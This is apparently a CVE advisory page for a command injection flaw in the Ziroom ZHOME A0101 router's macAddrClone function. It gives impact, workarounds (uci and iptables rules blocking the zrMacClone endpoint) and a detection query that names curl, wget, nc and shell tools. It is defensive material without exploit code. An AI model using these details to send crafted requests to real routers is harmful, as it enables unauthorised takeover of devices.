CVE-2026-1802
📋 TL;DR
This CVE describes a command injection vulnerability in the Ziroom ZHOME A0101 router firmware version 1.0.1.0. Attackers can remotely execute arbitrary commands on affected devices by manipulating the macType parameter in the macAddrClone function. This affects all users of this specific router model and firmware version.
💻 Affected Systems
- Ziroom ZHOME A0101
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Complete device compromise allowing attackers to install persistent backdoors, pivot to internal networks, intercept all network traffic, or brick the device.
Likely Case
Attackers gain shell access to execute commands, potentially installing malware, modifying router settings, or using the device as part of a botnet.
If Mitigated
If network segmentation and strict firewall rules are in place, impact may be limited to the router itself without lateral movement.
🎯 Exploit Status
Exploit code is publicly available on GitHub. The vulnerability requires no authentication and has simple exploitation steps.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Unknown
Vendor Advisory: None available
Restart Required: No
Instructions:
No official patch available. Consider replacing affected devices or implementing workarounds.
🔧 Temporary Workarounds
Disable web management interface
linuxDisable the vulnerable web interface to prevent remote exploitation
uci set uhttpd.main.listen_http=''
uci set uhttpd.main.listen_https=''
uci commit uhttpd
/etc/init.d/uhttpd restart
Block API endpoint via firewall
linuxBlock access to the vulnerable API endpoint using iptables
iptables -A INPUT -p tcp --dport 80 -m string --string "zrMacClone" --algo bm -j DROP
iptables -A INPUT -p tcp --dport 443 -m string --string "zrMacClone" --algo bm -j DROP
🧯 If You Can't Patch
- Isolate affected routers in a dedicated VLAN with strict firewall rules preventing outbound connections
- Implement network monitoring to detect exploitation attempts and unusual router behavior
🔍 How to Verify
Check if Vulnerable:
Check if router model is ZHOME A0101 and firmware version is 1.0.1.0 via web interface or SSHCheck Version:
cat /etc/openwrt_release | grep VERSIONVerify Fix Applied:
Test if the /api/zrMacClone endpoint is accessible and responds to crafted requests📡 Detection & Monitoring
Log Indicators:
- Unusual commands in system logs
- Failed authentication attempts to web interface
- Suspicious processes running on router
Network Indicators:
- Unusual outbound connections from router
- Traffic to known malicious IPs from router
- DNS queries to suspicious domains
SIEM Query:
source="router.log" AND "zrMacClone" AND ("curl" OR "wget" OR "nc" OR "bash" OR "sh")